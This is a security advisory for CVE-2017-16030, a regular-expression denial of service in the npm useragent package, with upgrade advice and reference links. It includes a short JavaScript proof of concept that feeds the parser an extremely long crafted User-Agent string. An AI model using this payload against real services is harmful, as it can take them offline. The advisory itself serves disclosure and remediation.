CVE-2017-16030 — ReDoS via long UserAgent header in useragent

Description

Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed. ## Proof of Concept ```js var useragent = require('useragent'); var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP'; var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n'; console.log(useragent.parse(request)); ``` ## Recommendation Update to version 2.1.13 or later.

How to fix CVE-2017-16030

To remediate CVE-2017-16030, upgrade the affected package to a fixed version below.

—upgrade to 2.1.13 or later

Is CVE-2017-16030 being exploited?

Low — EPSS is 0.4%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

from 0, < 2.1.13

References (3)

ADVISORYgithub.com/advisories/GHSA-pjmx-9xr3-82qr
ADVISORYnvd.nist.gov/vuln/detail/CVE-2017-16030
WEBwww.npmjs.com/advisories/312